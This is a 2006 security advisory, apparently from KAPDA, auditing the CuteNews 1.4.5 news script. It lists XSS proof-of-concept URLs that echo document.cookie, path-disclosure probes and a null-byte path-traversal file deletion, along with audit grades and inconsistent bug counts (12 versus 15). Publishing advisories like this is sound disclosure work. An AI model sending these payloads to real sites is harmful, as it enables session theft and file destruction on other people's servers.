[KAPDA]::Security analysis of cutenews 1.4.5

2006-11-22T00:00:00
ID SECURITYVULNS:DOC:15185
Type securityvulns
Reporter Securityvulns
Modified 2006-11-22T00:00:00

Description

Product: cutenews 1.4.5 Vendor: http://cutephp.com

The Results through security analysis of cutenews 1.4.5 [provided by KAPDA.ir]


Test plan: Manual penetration testing: YES Using automated tools: NO Code Auditing: YES

Statistical Results from 'security Audit' perspective

TOTAL UNIQUE BUGS (12)

Number of integration errors: 3 Type: Path Disclosure , Authorization error (privileges escalation), XSS PoC:index.php?debug DREAD Severity: 7 (Low) PoC:index.php?mod=images&subaction=upload DREAD Severity: 12 (Medium) PoC:rss.php?rss_news_include_url=aAa&rss_title=<script>alert(document.cookie)</script> DREAD Severity: 8 (Medium)

Number of Technical errors: 9 Type: XSS ,Html Injection, Path disclosure, Path traversal

PoC:show_news.php?KAPDA="><script>alert()</script> DREAD Severity: 7 (Low) PoC:index.php?mod=<script>alert(document.cookie)</script> DREAD Severity: 8 (Medium) PoC:search.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E DREAD Severity: 8 (Medium) PoC:index.php?mod=images&action=preview&image=>"</script><script>alert(document.cookie)</script> DREAD Severity: 8 (Medium) PoC:mod=images&action=quick&area='</script><script>alert(document.cookie)</script> DREAD Severity: 8 (Medium) PoC:index.php?mod=massactions&action=mass_delete&source="><script>alert(document.cookie)</script> DREAD Severity: 8 (Medium) PoC:Story field:</textarea><script>alert(document.cookie)</script> DREAD Severity: 12 (Medium) PoC:index.php?mod=massactions&action=mass_delete&selected_news=) DREAD Severity: 7 (Low) PoC:index.php?mod=massactions&action=do_mass_delete&selected_news=1&source=../upimages/ddddd.php%00 DREAD Severity: 10 (Medium)

Number of Logical errors: 0

Statistical Results from 'functional Risk Base' perspective

Authentication mechanism: passed Use a policy of least-privileged accounts: passed Session Management: passed Cookie Management: passed Sensitive Data Management: passed Cryptography:passed Error handling: Passed But with negligence Authorization: Passed But with negligence Configuration Management:Passed But with negligence PHP Coding Performance: Passed But with negligence Security by design: Passed But with negligence Note: using Extract() improperly, leads to several cross site scripting bugs. Input/Data validation: Not passed Auditing and Logging: Not Passed

Statistical Results from 'Security Metrics' perspective

Number of discovered bugs: 15 Number of reviewed Code Lines: 6000 Bugs per 10KLOC: 25 Vulnerabilities severity average: Low Number of discovered bugs after stable release: 15 Number of 'Documents' pages relevant to security: 1 Quality of Security support: Moderate

Security Grade at the current version (1.4.5) From Kapda : B- Note: All Grades are: A , B+ , B , B- , C+ , C , C- , D

Reference: http://www.kapda.ir/advisory-450.html


Sponsored Link

Online degrees - find the right program to advance your career. Www.nextag.com